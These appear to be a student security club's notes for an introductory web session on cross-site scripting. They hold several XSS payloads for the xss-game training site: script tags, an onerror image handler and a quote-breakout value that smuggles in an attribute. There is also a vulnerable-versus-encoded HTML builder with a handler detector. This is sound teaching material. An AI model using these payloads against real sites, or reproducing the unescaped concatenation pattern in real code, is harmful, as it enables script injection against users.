# NCtfU - 5/10 (WEB Onebone, Zone) (A205)

###### tags: `新手場` `nctfu2021`

## Attendees

- Onebone
- idisused
- yenchia
- Ping
- zone
- Jiun

## Speakers

- Onebone → ~~main speaker~~ [has already drifted off into the Pacific]
- Zone [slacking off]

## Speaker notes

### Cross Site Scripting

#### script tag:

```html=
<script src="a.js"></script>
<script>
/* script here */
</script>
```

#### DOM event:

https://www.w3schools.com/jsref/dom_obj_event.asp

Demo: https://xss-game.appspot.com/

Level 1:

```html=
<script>alert(1)</script>
<!-- change the page content -->
<script>document.body.innerHTML="Hello hacker"</script>
```

demo (level 1): "https://xss-game.appspot.com/level1/frame?query=%3Cscript%3Edocument.body.innerHTML=%22Hello+hacker%22%3C/script%3E"

Level 2 (DOM event):

```html=
<img src="not-exist" onerror="alert(1)">
<img onerror="/* javascript here */">
```

Level 3 (bypass):

Test case: https://xss-game.appspot.com/level3/frame#3.jpg'>

payload: `3.jpg'>` → the `'` closes the single-quoted `src` attribute and the `>` closes the tag, so whatever follows in the input is rendered as markup, e.g.:

```html=
<img src="https://dogecoin.org/static/11cf6c18151cbb22c6a25d704ae7b313/dd8fa/doge-main.jpg1" onerror="alert(1)">
```

## Shared notes

XSS String encoder: http://evuln.com/tools/xss-encoder/

XSSRF demo: https://xssrf.hackme.inndy.tw/
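The level 2 `onerror` handler and the level 3 attribute breakout both work because user input is concatenated straight into a single-quoted `src` attribute. The following is an added example (not from the notes or from xss-game): a builder that mirrors that pattern, the same builder with attribute-context encoding, and a small attribute scanner that shows the encoded version no longer carries an `on*` handler. The function names and the sample payload are constructed for this illustration.

```javascript
// Encode the five characters that can change meaning inside HTML text or a quoted attribute.
function encodeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[ch]);
}

// Vulnerable: input is concatenated into a single-quoted attribute, as in the level 3 frame.
function buildImgVulnerable(num) {
  return "<img src='" + num + ".jpg'>";
}

// Hardened: the same template, but the input is attribute-encoded first.
function buildImgSafe(num) {
  return "<img src='" + encodeHtmlAttr(num) + ".jpg'>";
}

// Minimal attribute scanner for a single tag: returns attribute names, honouring quotes
// so that a quoted value containing "onerror=" is not mistaken for an attribute.
function attributeNames(tagHtml) {
  const inner = tagHtml.replace(/^<\w+\s*/, "").replace(/\s*\/?>$/, "");
  const attrRe = /([^\s=\/>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = attrRe.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True if the tag ends up with any on* event-handler attribute (the level 2 technique).
function hasEventHandler(tagHtml) {
  return attributeNames(tagHtml).some((n) => n.startsWith("on"));
}

// Constructed sample input: closes the src value and smuggles in an onerror attribute.
const samplePayload = "1' onerror='alert(1)";

console.log(buildImgVulnerable(samplePayload), hasEventHandler(buildImgVulnerable(samplePayload)));
console.log(buildImgSafe(samplePayload), hasEventHandler(buildImgSafe(samplePayload)));
```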